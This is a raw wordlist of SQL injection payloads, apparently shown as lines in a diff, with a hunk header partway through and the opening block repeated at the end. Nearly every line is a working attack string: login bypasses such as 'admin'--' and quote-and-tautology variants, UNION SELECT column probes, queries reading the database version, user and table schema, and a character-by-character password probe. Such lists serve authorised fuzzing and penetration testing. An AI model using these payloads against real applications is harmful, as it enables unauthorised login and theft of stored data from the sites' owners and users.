||||||
'oR 2#
|
|
||||||
'oR 2/*
|
|
||||||
'oR 2 oR'
|
|
||||||
'oR/**/2-- 2
|
|
||||||
'oR/**/2#
|
|
||||||
'oR/**/2/*
|
|
||||||
'oR/**/2/**/oR'
|
|
||||||
"oR"2
|
|
||||||
"oR"2"-- 2
|
|
||||||
"oR"2"#
|
|
||||||
"oR"2"/*
|
|
||||||
"oR"2"oR"
|
|
||||||
"oR(2)-- 2
|
|
||||||
"oR(2)#
|
|
||||||
"oR(2)/*
|
|
||||||
"oR(2)oR"
|
|
||||||
"oR 2-- 2
|
|
||||||
"oR 2#
|
|
||||||
"oR 2/*
|
|
||||||
"oR 2 oR"
|
|
||||||
"oR/**/2-- 2
|
|
||||||
"oR/**/2#
|
|
||||||
"oR/**/2/*
|
|
||||||
"oR/**/2/**/oR"
|
|
||||||
|
|
||||||
'oR'2'='2
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR'2'='2'-- 2
|
|
||||||
'oR'2'='2'#
|
|
||||||
'oR'2'='2'/*
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR 2=2-- 2
|
|
||||||
'oR 2=2#
|
|
||||||
'oR 2=2/*
|
|
||||||
'oR 2=2 oR'
|
|
||||||
'oR/**/2=2-- 2
|
|
||||||
'oR/**/2=2#
|
|
||||||
'oR/**/2=2/*
|
|
||||||
'oR/**/2=2/**/oR'
|
|
||||||
'oR(2)=2-- 2
|
|
||||||
'oR(2)=2#
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=(2)oR'
|
|
||||||
'oR'2'='2' LimIT 1-- 2
|
|
||||||
'oR'2'='2' LimIT 1#
|
|
||||||
'oR'2'='2' LimIT 1/*
|
|
||||||
'oR(2)=(2)LimIT(1)-- 2
|
|
||||||
'oR(2)=(2)LimIT(1)#
|
|
||||||
'oR(2)=(2)LimIT(1)/*
|
|
||||||
"oR"2"="2
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR"2"="2"-- 2
|
|
||||||
"oR"2"="2"#
|
|
||||||
"oR"2"="2"/*
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR 2=2-- 2
|
|
||||||
"oR 2=2#
|
|
||||||
"oR 2=2/*
|
|
||||||
"oR 2=2 oR"
|
|
||||||
"oR/**/2=2-- 2
|
|
||||||
"oR/**/2=2#
|
|
||||||
"oR/**/2=2/*
|
|
||||||
"oR/**/2=2/**/oR"
|
|
||||||
"oR(2)=2-- 2
|
|
||||||
"oR(2)=2#
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=(2)oR"
|
|
||||||
"oR"2"="2" LimIT 1-- 2
|
|
||||||
"oR"2"="2" LimIT 1#
|
|
||||||
"oR"2"="2" LimIT 1/*
|
|
||||||
"oR(2)=(2)LimIT(1)-- 2
|
|
||||||
"oR(2)=(2)LimIT(1)#
|
|
||||||
"oR(2)=(2)LimIT(1)/*
|
|
||||||
|
|
||||||
'oR true-- 2
|
|
||||||
'oR true#
|
|
||||||
'oR true/*
|
|
||||||
'oR true oR'
|
|
||||||
'oR(true)-- 2
|
|
||||||
'oR(true)#
|
|
||||||
'oR(true)/*
|
|
||||||
'oR(true)oR'
|
|
||||||
'oR/**/true-- 2
|
|
||||||
'oR/**/true#
|
|
||||||
'oR/**/true/*
|
|
||||||
'oR/**/true/**/oR'
|
|
||||||
"oR true-- 2
|
|
||||||
"oR true#
|
|
||||||
"oR true/*
|
|
||||||
"oR true oR"
|
|
||||||
"oR(true)-- 2
|
|
||||||
"oR(true)#
|
|
||||||
"oR(true)/*
|
|
||||||
"oR(true)oR"
|
|
||||||
"oR/**/true-- 2
|
|
||||||
"oR/**/true#
|
|
||||||
"oR/**/true/*
|
|
||||||
"oR/**/true/**/oR"
|
|
||||||
|
|
||||||
'oR'2'LiKE'2
|
|
||||||
'oR'2'LiKE'2'-- 2
|
|
||||||
'oR'2'LiKE'2'#
|
|
||||||
'oR'2'LiKE'2'/*
|
|
||||||
'oR'2'LiKE'2'oR'
|
|
||||||
'oR(2)LiKE(2)-- 2
|
|
||||||
'oR(2)LiKE(2)#
|
|
||||||
'oR(2)LiKE(2)/*
|
|
||||||
'oR(2)LiKE(2)oR'
|
|
||||||
"oR"2"LiKE"2
|
|
||||||
"oR"2"LiKE"2"-- 2
|
|
||||||
"oR"2"LiKE"2"#
|
|
||||||
"oR"2"LiKE"2"/*
|
|
||||||
"oR"2"LiKE"2"oR"
|
|
||||||
"oR(2)LiKE(2)-- 2
|
|
||||||
"oR(2)LiKE(2)#
|
|
||||||
"oR(2)LiKE(2)/*
|
|
||||||
"oR(2)LiKE(2)oR"
|
|
||||||
|
|
||||||
admin
|
|
||||||
admin'-- 2
|
|
||||||
admin'#
|
|
||||||
admin'/*
|
|
||||||
admin"-- 2
|
|
||||||
admin"#
|
|
||||||
ffifdyop
|
|
||||||
|
|
||||||
' UniON SElecT 1,2-- 2
|
|
||||||
' UniON SElecT 1,2,3-- 2
|
|
||||||
' UniON SElecT 1,2,3,4-- 2
|
|
||||||
' UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
' UniON SElecT 1,2#
|
|
||||||
' UniON SElecT 1,2,3#
|
|
||||||
' UniON SElecT 1,2,3,4#
|
|
||||||
' UniON SElecT 1,2,3,4,5#
|
|
||||||
'UniON(SElecT(1),2)-- 2
|
|
||||||
'UniON(SElecT(1),2,3)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
'UniON(SElecT(1),2)#
|
|
||||||
'UniON(SElecT(1),2,3)#
|
|
||||||
'UniON(SElecT(1),2,3,4)#
|
|
||||||
'UniON(SElecT(1),2,3,4,5)#
|
|
||||||
" UniON SElecT 1,2-- 2
|
|
||||||
" UniON SElecT 1,2,3-- 2
|
|
||||||
" UniON SElecT 1,2,3,4-- 2
|
|
||||||
" UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
" UniON SElecT 1,2#
|
|
||||||
" UniON SElecT 1,2,3#
|
|
||||||
" UniON SElecT 1,2,3,4#
|
|
||||||
" UniON SElecT 1,2,3,4,5#
|
|
||||||
"UniON(SElecT(1),2)-- 2
|
|
||||||
"UniON(SElecT(1),2,3)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
"UniON(SElecT(1),2)#
|
|
||||||
"UniON(SElecT(1),2,3)#
|
|
||||||
"UniON(SElecT(1),2,3,4)#
|
|
||||||
"UniON(SElecT(1),2,3,4,5)#
|
|
||||||
|
|
||||||
'||'2
|
|
||||||
'||2-- 2
|
|
||||||
'||'2'||'
|
|
||||||
'||2#
|
|
||||||
'||2/*
|
|
||||||
'||2||'
|
|
||||||
"||"2
|
|
||||||
"||2-- 2
|
|
||||||
"||"2"||"
|
|
||||||
"||2#
|
|
||||||
"||2/*
|
|
||||||
"||2||"
|
|
||||||
'||'2'='2
|
|
||||||
'||'2'='2'||'
|
|
||||||
'||2=2-- 2
|
|
||||||
'||2=2#
|
|
||||||
'||2=2/*
|
|
||||||
'||2=2||'
|
|
||||||
"||"2"="2
|
|
||||||
"||"2"="2"||"
|
|
||||||
"||2=2-- 2
|
|
||||||
"||2=2#
|
|
||||||
"||2=2/*
|
|
||||||
"||2=2||"
|
|
||||||
'||2=(2)LimIT(1)-- 2
|
|
||||||
'||2=(2)LimIT(1)#
|
|
||||||
'||2=(2)LimIT(1)/*
|
|
||||||
"||2=(2)LimIT(1)-- 2
|
|
||||||
"||2=(2)LimIT(1)#
|
|
||||||
"||2=(2)LimIT(1)/*
|
|
||||||
'||true-- 2
|
|
||||||
'||true#
|
|
||||||
'||true/*
|
|
||||||
'||true||'
|
|
||||||
"||true-- 2
|
|
||||||
"||true#
|
|
||||||
"||true/*
|
|
||||||
"||true||"
|
|
||||||
'||'2'LiKE'2
|
|
||||||
'||'2'LiKE'2'-- 2
|
|
||||||
'||'2'LiKE'2'#
|
|
||||||
'||'2'LiKE'2'/*
|
|
||||||
'||'2'LiKE'2'||'
|
|
||||||
'||(2)LiKE(2)-- 2
|
|
||||||
'||(2)LiKE(2)#
|
|
||||||
'||(2)LiKE(2)/*
|
|
||||||
'||(2)LiKE(2)||'
|
|
||||||
"||"2"LiKE"2
|
|
||||||
"||"2"LiKE"2"-- 2
|
|
||||||
"||"2"LiKE"2"#
|
|
||||||
"||"2"LiKE"2"/*
|
|
||||||
"||"2"LiKE"2"||"
|
|
||||||
"||(2)LiKE(2)-- 2
|
|
||||||
"||(2)LiKE(2)#
|
|
||||||
"||(2)LiKE(2)/*
|
|
||||||
"||(2)LiKE(2)||"
|
|
||||||
|
|
||||||
')oR('2
|
|
||||||
')oR'2'-- 2
|
|
||||||
')oR'2'#
|
|
||||||
')oR'2'/*
|
|
||||||
')oR'2'oR('
|
|
||||||
')oR(2)-- 2
|
|
||||||
')oR(2)#
|
|
||||||
')oR(2)/*
|
|
||||||
')oR(2)oR('
|
|
||||||
')oR 2-- 2
|
|
||||||
')oR 2#
|
|
||||||
')oR 2/*
|
|
||||||
')oR 2 oR('
|
|
||||||
')oR/**/2-- 2
|
|
||||||
')oR/**/2#
|
|
||||||
')oR/**/2/*
|
|
||||||
')oR/**/2/**/oR('
|
|
||||||
")oR("2
|
|
||||||
")oR"2"-- 2
|
|
||||||
")oR"2"#
|
|
||||||
")oR"2"/*
|
|
||||||
")oR"2"oR("
|
|
||||||
")oR(2)-- 2
|
|
||||||
")oR(2)#
|
|
||||||
")oR(2)/*
|
|
||||||
")oR(2)oR("
|
|
||||||
")oR 2-- 2
|
|
||||||
")oR 2#
|
|
||||||
")oR 2/*
|
|
||||||
")oR 2 oR("
|
|
||||||
")oR/**/2-- 2
|
|
||||||
")oR/**/2#
|
|
||||||
")oR/**/2/*
|
|
||||||
")oR/**/2/**/oR("
|
|
||||||
')oR'2'=('2
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR'2'='2'-- 2
|
|
||||||
')oR'2'='2'#
|
|
||||||
')oR'2'='2'/*
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR 2=2-- 2
|
|
||||||
')oR 2=2#
|
|
||||||
')oR 2=2/*
|
|
||||||
')oR 2=2 oR('
|
|
||||||
')oR/**/2=2-- 2
|
|
||||||
')oR/**/2=2#
|
|
||||||
')oR/**/2=2/*
|
|
||||||
')oR/**/2=2/**/oR('
|
|
||||||
')oR(2)=2-- 2
|
|
||||||
')oR(2)=2#
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=(2)oR('
|
|
||||||
')oR'2'='2' LimIT 1-- 2
|
|
||||||
')oR'2'='2' LimIT 1#
|
|
||||||
')oR'2'='2' LimIT 1/*
|
|
||||||
')oR(2)=(2)LimIT(1)-- 2
|
|
||||||
')oR(2)=(2)LimIT(1)#
|
|
||||||
')oR(2)=(2)LimIT(1)/*
|
|
||||||
")oR"2"=("2
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR"2"="2"-- 2
|
|
||||||
")oR"2"="2"#
|
|
||||||
")oR"2"="2"/*
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR 2=2-- 2
|
|
||||||
")oR 2=2#
|
|
||||||
")oR 2=2/*
|
|
||||||
")oR 2=2 oR("
|
|
||||||
")oR/**/2=2-- 2
|
|
||||||
")oR/**/2=2#
|
|
||||||
")oR/**/2=2/*
|
|
||||||
")oR/**/2=2/**/oR("
|
|
||||||
")oR(2)=2-- 2
|
|
||||||
")oR(2)=2#
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=(2)oR("
|
|
||||||
")oR"2"="2" LimIT 1-- 2
|
|
||||||
")oR"2"="2" LimIT 1#
|
|
||||||
")oR"2"="2" LimIT 1/*
|
|
||||||
")oR(2)=(2)LimIT(1)-- 2
|
|
||||||
")oR(2)=(2)LimIT(1)#
|
|
||||||
")oR(2)=(2)LimIT(1)/*
|
|
||||||
')oR true-- 2
|
|
||||||
')oR true#
|
|
||||||
')oR true/*
|
|
||||||
')oR true oR('
|
|
||||||
')oR(true)-- 2
|
|
||||||
')oR(true)#
|
|
||||||
')oR(true)/*
|
|
||||||
')oR(true)oR('
|
|
||||||
')oR/**/true-- 2
|
|
||||||
')oR/**/true#
|
|
||||||
')oR/**/true/*
|
|
||||||
')oR/**/true/**/oR('
|
|
||||||
")oR true-- 2
|
|
||||||
")oR true#
|
|
||||||
")oR true/*
|
|
||||||
")oR true oR("
|
|
||||||
")oR(true)-- 2
|
|
||||||
")oR(true)#
|
|
||||||
")oR(true)/*
|
|
||||||
")oR(true)oR("
|
|
||||||
")oR/**/true-- 2
|
|
||||||
")oR/**/true#
|
|
||||||
")oR/**/true/*
|
|
||||||
")oR/**/true/**/oR("
|
|
||||||
')oR'2'LiKE('2
|
|
||||||
')oR'2'LiKE'2'-- 2
|
|
||||||
')oR'2'LiKE'2'#
|
|
||||||
')oR'2'LiKE'2'/*
|
|
||||||
')oR'2'LiKE'2'oR('
|
|
||||||
')oR(2)LiKE(2)-- 2
|
|
||||||
')oR(2)LiKE(2)#
|
|
||||||
')oR(2)LiKE(2)/*
|
|
||||||
')oR(2)LiKE(2)oR('
|
|
||||||
")oR"2"LiKE("2
|
|
||||||
")oR"2"LiKE"2"-- 2
|
|
||||||
")oR"2"LiKE"2"#
|
|
||||||
")oR"2"LiKE"2"/*
|
|
||||||
")oR"2"LiKE"2"oR("
|
|
||||||
")oR(2)LiKE(2)-- 2
|
|
||||||
")oR(2)LiKE(2)#
|
|
||||||
")oR(2)LiKE(2)/*
|
|
||||||
")oR(2)LiKE(2)oR("
|
|
||||||
admin')-- 2
|
|
||||||
admin')#
|
|
||||||
admin')/*
|
|
||||||
admin")-- 2
|
|
||||||
admin")#
|
|
||||||
') UniON SElecT 1,2-- 2
|
|
||||||
') UniON SElecT 1,2,3-- 2
|
|
||||||
') UniON SElecT 1,2,3,4-- 2
|
|
||||||
') UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
') UniON SElecT 1,2#
|
|
||||||
') UniON SElecT 1,2,3#
|
|
||||||
') UniON SElecT 1,2,3,4#
|
|
||||||
') UniON SElecT 1,2,3,4,5#
|
|
||||||
')UniON(SElecT(1),2)-- 2
|
|
||||||
')UniON(SElecT(1),2,3)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
')UniON(SElecT(1),2)#
|
|
||||||
')UniON(SElecT(1),2,3)#
|
|
||||||
')UniON(SElecT(1),2,3,4)#
|
|
||||||
')UniON(SElecT(1),2,3,4,5)#
|
|
||||||
") UniON SElecT 1,2-- 2
|
|
||||||
") UniON SElecT 1,2,3-- 2
|
|
||||||
") UniON SElecT 1,2,3,4-- 2
|
|
||||||
") UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
") UniON SElecT 1,2#
|
|
||||||
") UniON SElecT 1,2,3#
|
|
||||||
") UniON SElecT 1,2,3,4#
|
|
||||||
") UniON SElecT 1,2,3,4,5#
|
|
||||||
")UniON(SElecT(1),2)-- 2
|
|
||||||
")UniON(SElecT(1),2,3)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
")UniON(SElecT(1),2)#
|
|
||||||
")UniON(SElecT(1),2,3)#
|
|
||||||
")UniON(SElecT(1),2,3,4)#
|
|
||||||
")UniON(SElecT(1),2,3,4,5)#
|
|
||||||
')||('2
|
|
||||||
')||2-- 2
|
|
||||||
')||'2'||('
|
|
||||||
')||2#
|
|
||||||
')||2/*
|
|
||||||
')||2||('
|
|
||||||
")||("2
|
|
||||||
")||2-- 2
|
|
||||||
")||"2"||("
|
|
||||||
")||2#
|
|
||||||
")||2/*
|
|
||||||
")||2||("
|
|
||||||
')||'2'=('2
|
|
||||||
')||'2'='2'||('
|
|
||||||
')||2=2-- 2
|
|
||||||
')||2=2#
|
|
||||||
')||2=2/*
|
|
||||||
')||2=2||('
|
|
||||||
")||"2"=("2
|
|
||||||
")||"2"="2"||("
|
|
||||||
")||2=2-- 2
|
|
||||||
")||2=2#
|
|
||||||
")||2=2/*
|
|
||||||
")||2=2||("
|
|
||||||
')||2=(2)LimIT(1)-- 2
|
|
||||||
')||2=(2)LimIT(1)#
|
|
||||||
')||2=(2)LimIT(1)/*
|
|
||||||
")||2=(2)LimIT(1)-- 2
|
|
||||||
")||2=(2)LimIT(1)#
|
|
||||||
")||2=(2)LimIT(1)/*
|
|
||||||
')||true-- 2
|
|
||||||
')||true#
|
|
||||||
')||true/*
|
|
||||||
')||true||('
|
|
||||||
")||true-- 2
|
|
||||||
")||true#
|
|
||||||
")||true/*
|
|
||||||
")||true||("
|
|
||||||
')||'2'LiKE('2
|
|
||||||
')||'2'LiKE'2'-- 2
|
|
||||||
')||'2'LiKE'2'#
|
|
||||||
')||'2'LiKE'2'/*
|
|
||||||
')||'2'LiKE'2'||('
|
|
||||||
')||(2)LiKE(2)-- 2
|
|
||||||
')||(2)LiKE(2)#
|
|
||||||
')||(2)LiKE(2)/*
|
|
||||||
')||(2)LiKE(2)||('
|
|
||||||
")||"2"LiKE("2
|
|
||||||
")||"2"LiKE"2"-- 2
|
|
||||||
")||"2"LiKE"2"#
|
|
||||||
")||"2"LiKE"2"/*
|
|
||||||
")||"2"LiKE"2"||("
|
|
||||||
")||(2)LiKE(2)-- 2
|
|
||||||
")||(2)LiKE(2)#
|
|
||||||
")||(2)LiKE(2)/*
|
|
||||||
")||(2)LiKE(2)||("
|
|
||||||
' UnION SELeCT 1,2`
|
|
||||||
' UnION SELeCT 1,2,3`
|
|
||||||
' UnION SELeCT 1,2,3,4`
|
|
||||||
' UnION SELeCT 1,2,3,4,5`
|
|
||||||
" UnION SELeCT 1,2`
|
|
||||||
" UnION SELeCT 1,2,3`
|
|
||||||
" UnION SELeCT 1,2,3,4`
|
|
||||||
" UnION SELeCT 1,2,3,4,5`
|
|
||||||
@ -1,771 +0,0 @@
|
|||||||
'-'
|
|
||||||
' '
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
' or ''-'
|
|
||||||
' or '' '
|
|
||||||
' or ''&'
|
|
||||||
' or ''^'
|
|
||||||
' or ''*'
|
|
||||||
"-"
|
|
||||||
" "
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
" or ""-"
|
|
||||||
" or "" "
|
|
||||||
" or ""&"
|
|
||||||
" or ""^"
|
|
||||||
" or ""*"
|
|
||||||
or true--
|
|
||||||
" or true--
|
|
||||||
' or true--
|
|
||||||
") or true--
|
|
||||||
') or true--
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x')=('x
|
|
||||||
')) or (('x'))=(('x
|
|
||||||
" or "x"="x
|
|
||||||
") or ("x")=("x
|
|
||||||
")) or (("x"))=(("x
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1#
|
|
||||||
or 1=1/*
|
|
||||||
admin' --
|
|
||||||
admin' #
|
|
||||||
admin'/*
|
|
||||||
admin' or '1'='1
|
|
||||||
admin' or '1'='1'--
|
|
||||||
admin' or '1'='1'#
|
|
||||||
admin' or '1'='1'/*
|
|
||||||
admin'or 1=1 or ''='
|
|
||||||
admin' or 1=1
|
|
||||||
admin' or 1=1--
|
|
||||||
admin' or 1=1#
|
|
||||||
admin' or 1=1/*
|
|
||||||
admin') or ('1'='1
|
|
||||||
admin') or ('1'='1'--
|
|
||||||
admin') or ('1'='1'#
|
|
||||||
admin') or ('1'='1'/*
|
|
||||||
admin') or '1'='1
|
|
||||||
admin') or '1'='1'--
|
|
||||||
admin') or '1'='1'#
|
|
||||||
admin') or '1'='1'/*
|
|
||||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
admin" --
|
|
||||||
admin" #
|
|
||||||
admin"/*
|
|
||||||
admin" or "1"="1
|
|
||||||
admin" or "1"="1"--
|
|
||||||
admin" or "1"="1"#
|
|
||||||
admin" or "1"="1"/*
|
|
||||||
admin"or 1=1 or ""="
|
|
||||||
admin" or 1=1
|
|
||||||
admin" or 1=1--
|
|
||||||
admin" or 1=1#
|
|
||||||
admin" or 1=1/*
|
|
||||||
admin") or ("1"="1
|
|
||||||
admin") or ("1"="1"--
|
|
||||||
admin") or ("1"="1"#
|
|
||||||
admin") or ("1"="1"/*
|
|
||||||
admin") or "1"="1
|
|
||||||
admin") or "1"="1"--
|
|
||||||
admin") or "1"="1"#
|
|
||||||
admin") or "1"="1"/*
|
|
||||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
' --
|
|
||||||
' #
|
|
||||||
' –
|
|
||||||
'--
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
" --
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
' and 1='1
|
|
||||||
' and a='a
|
|
||||||
or 1=1
|
|
||||||
or true
|
|
||||||
' or ''='
|
|
||||||
" or ""="
|
|
||||||
1′) and '1′='1–
|
|
||||||
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
and 1=1
|
|
||||||
and 1=1–
|
|
||||||
' and 'one'='one
|
|
||||||
' and 'one'='one–
|
|
||||||
' group by password having 1=1--
|
|
||||||
' group by userid having 1=1--
|
|
||||||
' group by username having 1=1--
|
|
||||||
like '%'
|
|
||||||
or 0=0 --
|
|
||||||
or 0=0 #
|
|
||||||
or 0=0 –
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 --
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 –
|
|
||||||
" or 0=0 --
|
|
||||||
" or 0=0 #
|
|
||||||
" or 0=0 –
|
|
||||||
%' or '0'='0
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1/*
|
|
||||||
or 1=1#
|
|
||||||
or 1=1–
|
|
||||||
' or 1=1--
|
|
||||||
' or '1'='1
|
|
||||||
' or '1'='1'--
|
|
||||||
' or '1'='1'/*
|
|
||||||
' or '1'='1'#
|
|
||||||
' or '1′='1
|
|
||||||
' or 1=1
|
|
||||||
' or 1=1 --
|
|
||||||
' or 1=1 –
|
|
||||||
' or 1=1--
|
|
||||||
' or 1=1;#
|
|
||||||
' or 1=1/*
|
|
||||||
' or 1=1#
|
|
||||||
' or 1=1–
|
|
||||||
') or '1'='1
|
|
||||||
') or '1'='1--
|
|
||||||
') or '1'='1'--
|
|
||||||
') or '1'='1'/*
|
|
||||||
') or '1'='1'#
|
|
||||||
') or ('1'='1
|
|
||||||
') or ('1'='1--
|
|
||||||
') or ('1'='1'--
|
|
||||||
') or ('1'='1'/*
|
|
||||||
') or ('1'='1'#
|
|
||||||
'or'1=1
|
|
||||||
'or'1=1′
|
|
||||||
" or "1"="1
|
|
||||||
" or "1"="1"--
|
|
||||||
" or "1"="1"/*
|
|
||||||
" or "1"="1"#
|
|
||||||
" or 1=1
|
|
||||||
" or 1=1 --
|
|
||||||
" or 1=1 –
|
|
||||||
" or 1=1--
|
|
||||||
" or 1=1/*
|
|
||||||
" or 1=1#
|
|
||||||
" or 1=1–
|
|
||||||
") or "1"="1
|
|
||||||
") or "1"="1"--
|
|
||||||
") or "1"="1"/*
|
|
||||||
") or "1"="1"#
|
|
||||||
") or ("1"="1
|
|
||||||
") or ("1"="1"--
|
|
||||||
") or ("1"="1"/*
|
|
||||||
") or ("1"="1"#
|
|
||||||
) or '1′='1–
|
|
||||||
) or ('1′='1–
|
|
||||||
' or 1=1 LIMIT 1;#
|
|
||||||
'or 1=1 or ''='
|
|
||||||
"or 1=1 or ""="
|
|
||||||
' or 'a'='a
|
|
||||||
' or a=a--
|
|
||||||
' or a=a–
|
|
||||||
') or ('a'='a
|
|
||||||
" or "a"="a
|
|
||||||
") or ("a"="a
|
|
||||||
') or ('a'='a and hi") or ("a"="a
|
|
||||||
' or 'one'='one
|
|
||||||
' or 'one'='one–
|
|
||||||
' or uid like '%
|
|
||||||
' or uname like '%
|
|
||||||
' or userid like '%
|
|
||||||
' or user like '%
|
|
||||||
' or username like '%
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x'='x
|
|
||||||
" or "x"="x
|
|
||||||
' OR 'x'='x'#;
|
|
||||||
'=' 'or' and '=' 'or'
|
|
||||||
' UNION ALL SELECT 1, @@version;#
|
|
||||||
' UNION ALL SELECT system_user(),user();#
|
|
||||||
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
|
||||||
admin' and substring(password/text(),1,1)='7
|
|
||||||
' and substring(password/text(),1,1)='7
|
|
||||||
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
"
|
|
||||||
'-- 2
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
"-- 2
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
'-'
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
'='
|
|
||||||
0'<'2
|
|
||||||
"-"
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
"="
|
|
||||||
0"<"2
|
|
||||||
|
|
||||||
')
|
|
||||||
")
|
|
||||||
')-- 2
|
|
||||||
')/*
|
|
||||||
')#
|
|
||||||
")-- 2
|
|
||||||
") #
|
|
||||||
")/*
|
|
||||||
')-('
|
|
||||||
')&('
|
|
||||||
')^('
|
|
||||||
')*('
|
|
||||||
')=('
|
|
||||||
0')<('2
|
|
||||||
")-("
|
|
||||||
")&("
|
|
||||||
")^("
|
|
||||||
")*("
|
|
||||||
")=("
|
|
||||||
0")<("2
|
|
||||||
|
|
||||||
'-''-- 2
|
|
||||||
'-''#
|
|
||||||
'-''/*
|
|
||||||
'&''-- 2
|
|
||||||
'&''#
|
|
||||||
'&''/*
|
|
||||||
'^''-- 2
|
|
||||||
'^''#
|
|
||||||
'^''/*
|
|
||||||
'*''-- 2
|
|
||||||
'*''#
|
|
||||||
'*''/*
|
|
||||||
'=''-- 2
|
|
||||||
'=''#
|
|
||||||
'=''/*
|
|
||||||
0'<'2'-- 2
|
|
||||||
0'<'2'#
|
|
||||||
0'<'2'/*
|
|
||||||
"-""-- 2
|
|
||||||
"-""#
|
|
||||||
"-""/*
|
|
||||||
"&""-- 2
|
|
||||||
"&""#
|
|
||||||
"&""/*
|
|
||||||
"^""-- 2
|
|
||||||
"^""#
|
|
||||||
"^""/*
|
|
||||||
"*""-- 2
|
|
||||||
"*""#
|
|
||||||
"*""/*
|
|
||||||
"=""-- 2
|
|
||||||
"=""#
|
|
||||||
"=""/*
|
|
||||||
0"<"2"-- 2
|
|
||||||
0"<"2"#
|
|
||||||
0"<"2"/*
|
|
||||||
|
|
||||||
')-''-- 2
|
|
||||||
')-''#
|
|
||||||
')-''/*
|
|
||||||
')&''-- 2
|
|
||||||
')&''#
|
|
||||||
')&''/*
|
|
||||||
')^''-- 2
|
|
||||||
')^''#
|
|
||||||
')^''/*
|
|
||||||
')*''-- 2
|
|
||||||
')*''#
|
|
||||||
')*''/*
|
|
||||||
')=''-- 2
|
|
||||||
')=''#
|
|
||||||
')=''/*
|
|
||||||
0')<'2'-- 2
|
|
||||||
0')<'2'#
|
|
||||||
0')<'2'/*
|
|
||||||
")-""-- 2
|
|
||||||
")-""#
|
|
||||||
")-""/*
|
|
||||||
")&""-- 2
|
|
||||||
")&""#
|
|
||||||
")&""/*
|
|
||||||
")^""-- 2
|
|
||||||
")^""#
|
|
||||||
")^""/*
|
|
||||||
")*""-- 2
|
|
||||||
")*""#
|
|
||||||
")*""/*
|
|
||||||
")=""-- 2
|
|
||||||
")=""#
|
|
||||||
")=""/*
|
|
||||||
0")<"2-- 2
|
|
||||||
0")<"2#
|
|
||||||
0")<"2/*
|
|
||||||
|
|
||||||
|
|
||||||
'oR'2
|
|
||||||
'oR'2'-- 2
|
|
||||||
'oR'2'#
|
|
||||||
'oR'2'/*
|
|
||||||
'oR'2'oR'
|
|
||||||
'oR(2)-- 2
|
|
||||||
'oR(2)#
|
|
||||||
'oR(2)/*
|
|
||||||
'oR(2)oR'
|
|
||||||
'oR 2-- 2
|
|
||||||
'oR 2#
|
|
||||||
'oR 2/*
|
|
||||||
'oR 2 oR'
|
|
||||||
'oR/**/2-- 2
|
|
||||||
'oR/**/2#
|
|
||||||
'oR/**/2/*
|
|
||||||
'oR/**/2/**/oR'
|
|
||||||
"oR"2
|
|
||||||
"oR"2"-- 2
|
|
||||||
"oR"2"#
|
|
||||||
"oR"2"/*
|
|
||||||
"oR"2"oR"
|
|
||||||
"oR(2)-- 2
|
|
||||||
"oR(2)#
|
|
||||||
"oR(2)/*
|
|
||||||
"oR(2)oR"
|
|
||||||
"oR 2-- 2
|
|
||||||
"oR 2#
|
|
||||||
"oR 2/*
|
|
||||||
"oR 2 oR"
|
|
||||||
"oR/**/2-- 2
|
|
||||||
"oR/**/2#
|
|
||||||
"oR/**/2/*
|
|
||||||
"oR/**/2/**/oR"
|
|
||||||
|
|
||||||
'oR'2'='2
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR'2'='2'-- 2
|
|
||||||
'oR'2'='2'#
|
|
||||||
'oR'2'='2'/*
|
|
||||||
